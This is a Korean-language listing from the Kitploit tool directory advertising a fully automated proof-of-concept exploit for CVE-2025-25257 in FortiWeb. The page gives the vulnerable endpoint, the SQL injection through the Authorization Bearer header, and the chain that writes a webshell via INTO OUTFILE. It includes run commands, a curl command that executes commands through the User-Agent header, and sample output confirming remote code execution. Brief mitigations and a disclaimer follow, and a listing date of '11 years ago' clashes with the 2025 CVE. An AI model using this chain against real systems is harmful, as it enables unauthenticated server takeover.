Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-25257 — CVE-2025-25257에 대한 PoC로, FortiWeb의 중요하고 인증이 필요 없는 SQL 인젝션 취약점입니다. Authorization 헤더를 통해 SQLi를 악용하여 웹쉘을 작성하고 RCE를 획득합니다. 로그인이 필요하지 않습니다. 완전 자동화되었습니다. | Kitploit
도구/GitHubGitHub/0xgh057r3c0n/cve-2025-25257
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHub0xgh057r3c0n/cve-2025-25257

CVE-2025-25257

CVE-2025-25257에 대한 PoC로, FortiWeb의 중요하고 인증이 필요 없는 SQL 인젝션 취약점입니다. Authorization 헤더를 통해 SQLi를 악용하여 웹쉘을 작성하고 RCE를 획득합니다. 로그인이 필요하지 않습니다. 완전 자동화되었습니다.

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 CVE-2025-25257 – FortiWeb SQLi를 통한 RCE

심각한 SQL 인젝션 → 웹쉘 실행

발견 및 공격 도구화: 0xgh057r3c0n


🧠 취약점 개요

CVE-2025-25257는 /api/fabric/device/status 엔드포인트를 노출하는 FortiWeb 시스템에 영향을 미치며, 이는 Authorization 헤더 입력을 적절히 검증하지 않습니다.

공격자는 인증 없이 SQL 인젝션을 수행하여 서버에 웹쉘을 작성하고 원격으로 명령을 실행할 수 있습니다.


💥 공격 흐름

root@kitploit:~
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE

📍 취약한 엔드포인트

root@kitploit:~
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>

🔓 익스플로잇 기능

  • Bearer 토큰을 통한 SQLi
  • SQL INTO OUTFILE을 통한 쉘 드롭
  • Python 훅이 chmod를 트리거
  • User-Agent 헤더를 통해 명령 실행
  • 완전 자동화된 PoC

🧪 사용법

root@kitploit:~
python3 CVE-2025-25257.py -t https://target-host.com

그런 다음:

root@kitploit:~
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi

🔧 요구 사항

  • Python 3.6+
  • requests 모듈

설치:

root@kitploit:~
pip install requests

📤 샘플 출력

root@kitploit:~
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)

[+] Webshell Ready:
    > https://target-host.com/cgi-bin/x.cgi
    > Send commands via User-Agent header

📊 CVSS 추정치

메트릭값
기본 점수9.8 (심각)
공격 벡터네트워크
필요 권한없음
사용자 상호작용없음
영향높음 (C/I/A)

🛡️ 완화 방안

  • FortiWeb 펌웨어 업데이트 (패치 가능한 경우)
  • 모든 헤더 입력 검증
  • 파일 쓰기 경로 및 CGI 실행 제한

👨‍💻 작성자

0xgh057r3c0n 🔗 github.com/0xgh057r3c0n


⚠️ 면책 조항

이 개념 증명은 교육 및 승인된 테스트 목적으로만 제공됩니다. 사용에 따른 모든 책임은 본인에게 있습니다. 저자는 오용에 대해 책임을 지지 않습니다.


도구 다운로드